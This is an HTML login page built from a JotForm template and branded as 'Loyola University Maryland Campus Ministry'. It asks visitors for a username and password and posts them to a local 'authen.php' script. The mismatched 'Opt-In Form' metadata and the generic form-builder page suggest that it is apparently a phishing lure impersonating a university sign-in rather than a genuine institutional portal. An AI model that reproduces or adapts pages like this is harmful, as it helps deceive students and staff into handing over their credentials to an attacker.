<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="supernova"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="alternate" type="application/json+oembed" href="https://www.jotform.com/oembed/?format=json&amp;url=http%3A%2F%2Fwww.jotform.com%2Fform%2F70895531991165" title="oEmbed Form"><link rel="alternate" type="text/xml+oembed" href="https://www.jotform.com/oembed/?format=xml&amp;url=http%3A%2F%2Fwww.jotform.com%2Fform%2F70895531991165" title="oEmbed Form">
<meta property="og:title" content="Opt-In Form" >
<meta property="og:url" content="http://www.jotform.us/form/70895531991165" >
<meta property="og:description" content="Please click the link to complete this form.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
<meta name="HandheldFriendly" content="true" />
<title>Log-in</title>
<link href="https://cdn.jotfor.ms/static/formCss.css?3.3.18167" rel="stylesheet" type="text/css" />
<link type="text/css" rel="stylesheet" href="https://cdn.jotfor.ms/css/styles/nova.css?3.3.18167" />
<link type="text/css" media="print" rel="stylesheet" href="https://cdn.jotfor.ms/css/printForm.css?3.3.18167" />
<link type="text/css" rel="stylesheet" href="https://cdn.jotfor.ms/themes/CSS/566a91c2977cdfcd478b4567.css?"/>
<style type="text/css">
    .form-label-left{
        width:150px !important;
    }
    .form-line{
        padding-top:1px;
        padding-bottom:1px;
    }
    .form-label-right{
        width:150px !important;
    }
    body, html{
        margin:0;
        padding:0;
        background:false;
    }

    .form-all{
        margin:0px auto;
        padding-top:20px;
        width:300px;
        color:#555 !important;
        font-family:"Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", Verdana, sans-serif;
        font-size:14px;
    }
    .form-radio-item label, .form-checkbox-item label, .form-grading-label, .form-header{
        color: #555;
    }

</style>

<style type="text/css" id="form-designer-style">
    /* Injected CSS Code */
/*PREFERENCES STYLE*/
    .form-all {
      font-family: Lucida Grande, sans-serif;
    }
    .form-all .qq-upload-button,
    .form-all .form-submit-button,
    .form-all .form-submit-reset,
    .form-all .form-submit-print {
      font-family: Lucida Grande, sans-serif;
    }
    .form-all .form-pagebreak-back-container,
    .form-all .form-pagebreak-next-container {
      font-family: Lucida Grande, sans-serif;
    }
    .form-header-group {
      font-family: Lucida Grande, sans-serif;
    }
    .form-label {
      font-family: Lucida Grande, sans-serif;
    }
  
    .form-label.form-label-auto {
      
    display: inline-block;
    float: left;
    text-align: left;
  
    }
  
    .form-line {
      margin-top: 1px;
      margin-bottom: 1px;
    }
  
    .form-all {
      width: 300px;
    }
  
    .form-label-left,
    .form-label-right {
      width: 150px
    }
  
    .form-all {
      font-size: 14px
    }
    .form-all .qq-upload-button,
    .form-all .qq-upload-button,
    .form-all .form-submit-button,
    .form-all .form-submit-reset,
    .form-all .form-submit-print {
      font-size: 14px
    }
    .form-all .form-pagebreak-back-container,
    .form-all .form-pagebreak-next-container {
      font-size: 14px
    }
  
    .supernova .form-all, .form-all {
      background-color: ;
      border: 1px solid transparent;
    }
  
    .form-all {
      color: #555;
    }
    .form-header-group .form-header {
      color: #555;
    }
    .form-header-group .form-subHeader {
      color: #555;
    }
    .form-label-top,
    .form-label-left,
    .form-label-right,
    .form-html,
    .form-checkbox-item label,
    .form-radio-item label {
      color: #555;
    }
    .form-sub-label {
      color: #6f6f6f;
    }
  
    .supernova {
      background-color: undefined;
    }
    .supernova body {
      background: transparent;
    }
  
    .form-textbox,
    .form-textarea,
    .form-radio-other-input,
    .form-checkbox-other-input,
    .form-captcha input,
    .form-spinner input {
      background-color: undefined;
    }
  
    .supernova {
      background-image: none;
    }
    #stage {
      background-image: none;
    }
  
    .form-all {
      background-image: none;
    }
  /*PREFERENCES STYLE*//*__INSPECT_SEPERATOR__*/.form-all {
	background: #454545;
	color: #fff !important;
	border: 1px solid #000;
	border-radius: 5px;
}
.form-line-error {
	background: transparent;
}
.form-line-error .form-error-message, .form-label-left {
	display: none;
}
.form-button-error {
	color: white;
	text-align: center;
}
.form-textbox {
	border-radius: 5px;
	height: 32px;
	width: 220px;
}
.form-textbox:focus {
	background-color: #fafaea;
}
.form-submit-button {
	border: 1px solid #00A092; !important;
	border-radius: 3px!important;
	font-weight: bold!important;
	height: 43px !important;
	width: 220px !important;
	background: #00A092; !important;
	font-size: 16px;
	text-shadow: none;
	box-shadow: none;
	color: #fff;
}
.form-submit-button:hover {
	border: 1px solid #333; !important;
	border-radius: 3px!important;
	font-weight: bold!important;
	height: 43px !important;
	width: 220px !important;
	background: #333; !important;
	font-size: 16px;
	text-shadow: none;
	box-shadow: none;
	color: #fff;
}
#text_1 {
	font-size: 11px;
	font-family: Arial;
}
#text_5 {
	font-family: 'PT Sans Caption', sans-serif;
	font-weight: bold;
	font-size: 19px;
	text-align: center;
}
#text_6 {
	font-family: 'PT Sans Caption', sans-serif;
	text-align: center;
	margin-top: -32px;
	line-height: 20px;
}
    /* Injected CSS Code */
</style>

<script src="https://cdn.jotfor.ms/static/prototype.forms.js" type="text/javascript"></script>
<script src="https://cdn.jotfor.ms/static/jotform.forms.js?3.3.18167" type="text/javascript"></script>
<script type="text/javascript">
   JotForm.init(function(){
      setTimeout(function() {
          $('input_8').hint('username');
       }, 20);
      setTimeout(function() {
          $('input_9').hint('password');
       }, 20);
      JotForm.highlightInputs = false;
	JotForm.clearFieldOnHide="disable";
	JotForm.onSubmissionError="jumpToSubmit";
   });
</script>
</head>
<body>
<form class="jotform-form" action="authen.php"  method="post" accept-charset="utf-8">
  <div class="form-all">
    <ul class="form-section page-section">
      <li class="form-line" data-type="control_text" id="id_5">
        <div id="cid_5" class="form-input-wide">
          <div id="text_5" class="form-html" data-component="text">
            <p>Loyola University Maryland Campus Ministry</p>
          </div>
        </div>
      </li>
      <li class="form-line" data-type="control_text" id="id_6">
        <div id="cid_6" class="form-input-wide">
          <div id="text_6" class="form-html" data-component="text">
            <p>Please Enter your login below to get access. </p>
          </div>
        </div>
      </li>	
      <li class="form-line jf-required" data-type="control_textbox" id="id_8">
        <label class="form-label form-label-left form-label-auto" for="username">
            Username
          <span class="form-required">
            * 
          </span>
        </label>
        <div id="cid_8" class="form-input jf-required">
          <span class="form-sub-label-container" style="vertical-align:top;">
            <input type="text" name="username" data-type="input-textbox" class="form-textbox validate[required]" size="20" value="" placeholder="username" data-component="textbox" />
            <label class="form-sub-label" for="input_8" style="min-height:13px;"> </label>
          </span>
        </div>
      </li>
      <li class="form-line jf-required" data-type="control_textbox" id="id_9">
        <label class="form-label form-label-left form-label-auto" for="password">
            Password
          <span class="form-required">
            * 
          </span>
        </label>
        <div id="cid_9" class="form-input jf-required">
          <span class="form-sub-label-container" style="vertical-align:top;">
            <input type="password" name="password" data-type="input-textbox" class="form-textbox validate[required]" size="20" value="" maxlength="20" placeholder="password" data-component="textbox" />
            <label class="form-sub-label" for="input_9" style="min-height:13px;"> </label>
          </span>
        </div>
      </li>
      <li class="form-line" data-type="control_text" id="id_1">
        <div id="cid_1" class="form-input-wide">
          <div id="text_1" class="form-html" data-component="text">
            <p><img style="float:left;" src="http://cms.jotform.com/uploads/image_upload/image_upload/global/20791_privacy.png" alt width="16" height="15" />Never Share your login with anyone.</p>
          </div>
        </div>
      </li>
      <li class="form-line" data-type="control_button" id="id_2">
        <div id="cid_2" class="form-input-wide">
          <div style="text-align:center;" class="form-buttons-wrapper">
            <button id="input_2" type="submit" class="form-submit-button" data-component="button">
              Login
            </button>
          </div>
        </div>
      </li>
      <li style="display:none">
        Should be Empty:
        <input type="text" name="website" value="" />
      </li>
    </ul>
  </div>
</form></body>
</html>